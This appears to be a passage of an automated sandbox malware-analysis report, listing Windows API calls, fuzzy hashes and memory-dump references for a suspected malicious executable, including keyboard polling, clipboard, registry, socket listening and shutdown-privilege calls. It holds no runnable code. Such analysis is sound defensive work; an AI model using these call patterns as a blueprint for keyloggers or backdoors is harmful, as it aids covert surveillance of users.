                                                        • FindClose.KERNEL32(00000000), ref: 00E86506
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                        • String ID: \*.*
                                                        • API String ID: 2643075503-1173974218
                                                        • Opcode ID: 4eccecd7fc0d04c081745ae136296b1701bd9ce5d4fa43da31ec4c3d795b3aed
                                                        • Instruction ID: 34932cce83bb7d2fdf8046158ac756baaad8d36a1ee1b709008449be0a9a4b05
                                                        • Opcode Fuzzy Hash: 4eccecd7fc0d04c081745ae136296b1701bd9ce5d4fa43da31ec4c3d795b3aed
                                                        • Instruction Fuzzy Hash: 3E318FB24083889EC721EBA48885ADBB7DCAF55314F04192AF6DCD3141EA36D50D8767
                                                        APIs
                                                          • Part of subcall function 00EA3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA2BB5,?,?), ref: 00EA3C1D
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA328E
                                                          • Part of subcall function 00E4936C: __swprintf.LIBCMT ref: 00E493AB
                                                          • Part of subcall function 00E4936C: __itow.LIBCMT ref: 00E493DF
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EA332D
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EA33C5
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EA3604
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00EA3611
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: 2944c91b626539348dfad9d30b2f5dc2d3dec36a955f32c61a597d519e5b2db6
                                                        • Instruction ID: 3f0d5c8748723e24a206b9c579ebd4189d4d32994c4d4ed7c70fba27b7915afb
                                                        • Opcode Fuzzy Hash: 2944c91b626539348dfad9d30b2f5dc2d3dec36a955f32c61a597d519e5b2db6
                                                        • Instruction Fuzzy Hash: 14E17D31604200AFCB14DF29C991E6ABBE9FF89714F04986DF45AEB261DB31ED05CB51
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00E82B5F
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00E82BE0
                                                        • GetKeyState.USER32(000000A0), ref: 00E82BFB
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00E82C15
                                                        • GetKeyState.USER32(000000A1), ref: 00E82C2A
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00E82C42
                                                        • GetKeyState.USER32(00000011), ref: 00E82C54
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00E82C6C
                                                        • GetKeyState.USER32(00000012), ref: 00E82C7E
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00E82C96
                                                        • GetKeyState.USER32(0000005B), ref: 00E82CA8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 55ef06069f0d30881194c4518f89e3f7f4c8d9fc7e0efa0d5ccb98bb12245169
                                                        • Instruction ID: 5d8da410c0c354657ef2bb6ac58533e7498e787f3d9ded7fcab1d5ee142dcfe5
                                                        • Opcode Fuzzy Hash: 55ef06069f0d30881194c4518f89e3f7f4c8d9fc7e0efa0d5ccb98bb12245169
                                                        • Instruction Fuzzy Hash: 6941A3345047C96DFF35AB6489047B9FEA06B11348F04905DD7CE762C1EAA699C8C7A2
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: b2f71129fc6f0360b50326fb8b6f24687bf2709844da7a9d154df45481ff61e5
                                                        • Instruction ID: 82da9bb72c48b93f367ce39b41fc0e39b09e53d2764a6084d550c04487ed38eb
                                                        • Opcode Fuzzy Hash: b2f71129fc6f0360b50326fb8b6f24687bf2709844da7a9d154df45481ff61e5
                                                        • Instruction Fuzzy Hash: 7C217A31304110AFDB11AF65ED49F6EB7E8FF44711F00942AF94AAB2A1CB32E906CB50
                                                        APIs
                                                          • Part of subcall function 00E79ABF: CLSIDFromProgID.OLE32 ref: 00E79ADC
                                                          • Part of subcall function 00E79ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00E79AF7
                                                          • Part of subcall function 00E79ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00E79B05
                                                          • Part of subcall function 00E79ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00E79B15
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E9C235
                                                        • _memset.LIBCMT ref: 00E9C242
                                                        • _memset.LIBCMT ref: 00E9C360
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00E9C38C
                                                        • CoTaskMemFree.OLE32(?), ref: 00E9C397
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 00E9C3E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 1300414916-2785691316
                                                        • Opcode ID: 0c4205a784fb64c67577f310a31538e63959b14ac6a432cd5748297490aa6816
                                                        • Instruction ID: 30aeac26ffe765256efd34777373bdedcbc24797ebe5f50a86e15b9efc118a9e
                                                        • Opcode Fuzzy Hash: 0c4205a784fb64c67577f310a31538e63959b14ac6a432cd5748297490aa6816
                                                        • Instruction Fuzzy Hash: CD911871D00218ABDF10EF94DC45EEEBBB8AF04750F20916AF919B7291EB715A45CBA0
                                                        APIs
                                                          • Part of subcall function 00E7B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E7B180
                                                          • Part of subcall function 00E7B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E7B1AD
                                                          • Part of subcall function 00E7B134: GetLastError.KERNEL32 ref: 00E7B1BA
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00E87A0F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: f8fa2ec38ac4e21558ba2c99770a1ec797809845248aa282a87480289fa7fd02
                                                        • Instruction ID: 9ec97867b5fb58943f62a65a816e8cb6b314c38b47634e4df6f5f4b3d0b2b98f
                                                        • Opcode Fuzzy Hash: f8fa2ec38ac4e21558ba2c99770a1ec797809845248aa282a87480289fa7fd02
                                                        • Instruction Fuzzy Hash: 0C0184716592116EE72C7668DC9AFBF72589B00744F346874BD8FB20D2E962DE0183B4
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E98CA8
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00E98CB7
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00E98CD3
                                                        • listen.WSOCK32(00000000,00000005), ref: 00E98CE2
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00E98CFC
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00E98D10
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: 3de87153699d5f7279e3c609ad29e00290990294b332c70565fd431a0ee70411
                                                        • Instruction ID: f2c2385cd16717f59cf092bb5e8208d4a070be9e8dd85d63ef07cf8660595cad
                                                        • Opcode Fuzzy Hash: 3de87153699d5f7279e3c609ad29e00290990294b332c70565fd431a0ee70411
                                                        • Instruction Fuzzy Hash: FC2104316002009FCB14EF64CD44F6EB3E9EF4A314F105529F956B72E2CB30AD468B51
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E86554
                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E86564
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00E86583
                                                        • __wsplitpath.LIBCMT ref: 00E865A7
                                                        • _wcscat.LIBCMT ref: 00E865BA
                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E865F9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                        • String ID:
                                                        • API String ID: 1605983538-0
                                                        • Opcode ID: 8a46f84f10f818d2e04931b966023ab083cefebff091238cb5d5540a151e20fc
                                                        • Instruction ID: 8affd88857a022ecad79500457276f8d83539d1525ec389d9076c935eab52cdb
                                                        • Opcode Fuzzy Hash: 8a46f84f10f818d2e04931b966023ab083cefebff091238cb5d5540a151e20fc
                                                        • Instruction Fuzzy Hash: 67217F71904218AFDB11ABA4DC88FEAB7BCAB48304F5014B9E509F7141EB719B85CB60
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E813DC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($,2$<2$|
                                                        • API String ID: 1659193697-916407979
                                                        • Opcode ID: 03c5f4f23ec0968edfa561563d7d94687e0ae98ecb3cc5fa348af8162f1b2cb9
                                                        • Instruction ID: fa4472915e33cb75bdafd60a042924cd7d2d495d53fa50645cedcba18504a1e6
                                                        • Opcode Fuzzy Hash: 03c5f4f23ec0968edfa561563d7d94687e0ae98ecb3cc5fa348af8162f1b2cb9
                                                        • Instruction Fuzzy Hash: 05323675A006059FC728DF69C4819AAB7F4FF48314B11D4AEE5AEEB3A1D770E942CB40
                                                        APIs
                                                          • Part of subcall function 00E9A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00E9A84E
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00E99296
                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00E992B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 4170576061-0
                                                        • Opcode ID: 1e9b2095d11fe22690974606e84cfdad10166651d0b6bbbd5303eeae598a24d7
                                                        • Instruction ID: daf96850e94df19b03a23eac29020adb0aedeab6a06cfe7c8d452b285207ca60
                                                        • Opcode Fuzzy Hash: 1e9b2095d11fe22690974606e84cfdad10166651d0b6bbbd5303eeae598a24d7
                                                        • Instruction Fuzzy Hash: 4F41CE70600200AFDB14AF68CC82E7EB7EDEF45724F14985CF956BB2D2CA759D028B91
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E8EB8A
                                                        • _wcscmp.LIBCMT ref: 00E8EBBA
                                                        • _wcscmp.LIBCMT ref: 00E8EBCF
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00E8EBE0
                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00E8EC0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 2387731787-0
                                                        • Opcode ID: 11a93dfc4f8158ec1c2cf7ae576275b30334fda8f13fe04554900fee627665be
                                                        • Instruction ID: 40c6eeef45e4ded216131f249576d3f68375b3725170f6d35d1903173891e698
                                                        • Opcode Fuzzy Hash: 11a93dfc4f8158ec1c2cf7ae576275b30334fda8f13fe04554900fee627665be
                                                        • Instruction Fuzzy Hash: 5341B0356043018FC718EF28C491A9AF3E4FF4A324F10556DEA5EAB3A1DB31E945CB51
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: 5b9dd14c0bfbca946eebec1ecd41b037c51d141de26f8e59f455fa31199c2563
                                                        • Instruction ID: 212def93572adc17f1af4ee0bbb361781294fd9759c64c1717da37c38a12ff21
                                                        • Opcode Fuzzy Hash: 5b9dd14c0bfbca946eebec1ecd41b037c51d141de26f8e59f455fa31199c2563
                                                        • Instruction Fuzzy Hash: 411190313011116FE7212F269D44E6EBB98EFAA764B04143DF94AFB241CF31A90386A4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                        • API String ID: 0-1546025612
                                                        • Opcode ID: 778a2602a18b5c73e8b41ca52c6e128b55d2c548615e938ef6af59d86225a45b
                                                        • Instruction ID: 1525640c6b05dac431a410c907b46e1f9bf8838f69657830ba76b2317786e015
                                                        • Opcode Fuzzy Hash: 778a2602a18b5c73e8b41ca52c6e128b55d2c548615e938ef6af59d86225a45b
                                                        • Instruction Fuzzy Hash: 1F92AF71E00219CBDF24CF58D941BFEB7B1BB54318F2891AAE81AB7281D7719D82CB51
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E5E014,75920AE0,00E5DEF1,00EDDC38,?,?), ref: 00E5E02C
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E5E03E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: 9bbc6f47fcf3617effce212ece73dd8483e2b2423ebb53a8b8e42c751c441de2
                                                        • Instruction ID: 061db3b451b16c314210d18538234775462eb4067a253a2958d35c582dcec8b3
                                                        • Opcode Fuzzy Hash: 9bbc6f47fcf3617effce212ece73dd8483e2b2423ebb53a8b8e42c751c441de2
                                                        • Instruction Fuzzy Hash: B3D0A7318047129FC7364F61EC08A3277D4AB00305F2C583DE981F2290D7B5CC898650
                                                        APIs
                                                          • Part of subcall function 00E5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E5B35F
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E5B22F
                                                          • Part of subcall function 00E5B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00E5B5A5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Proc$LongWindow
                                                        • String ID:
                                                        • API String ID: 2749884682-0
                                                        • Opcode ID: bde0f3f2ff1429eaf92bc9da51ac0f662b97991f62058c6fb1b356af246f8be8
                                                        • Instruction ID: eae05f34098215423fca84c7ec459a85fb12082dd1da55021d81509f7680418f
                                                        • Opcode Fuzzy Hash: bde0f3f2ff1429eaf92bc9da51ac0f662b97991f62058c6fb1b356af246f8be8
                                                        • Instruction Fuzzy Hash: D8A14874114005FADB386B295C89EFF299CFB4634AF14792DFC02FA2A1CB159C09A672
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E943BF,00000000), ref: 00E94FA6
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E94FD2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        • Opcode ID: 7a9919584c3cce30eaf929901f30ec4efaedc1c5b0289ab1c195f5dee3644497
                                                        • Instruction ID: 949dd86816f64111a48b7c5d825cf8fd6f726a98ebd31079eba28a02d2e105f9
                                                        • Opcode Fuzzy Hash: 7a9919584c3cce30eaf929901f30ec4efaedc1c5b0289ab1c195f5dee3644497
                                                        • Instruction Fuzzy Hash: 2B41F8B260460ABFEF219F90DC81EBF77BCEB40358F10202EF605B6180DA719E469750
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
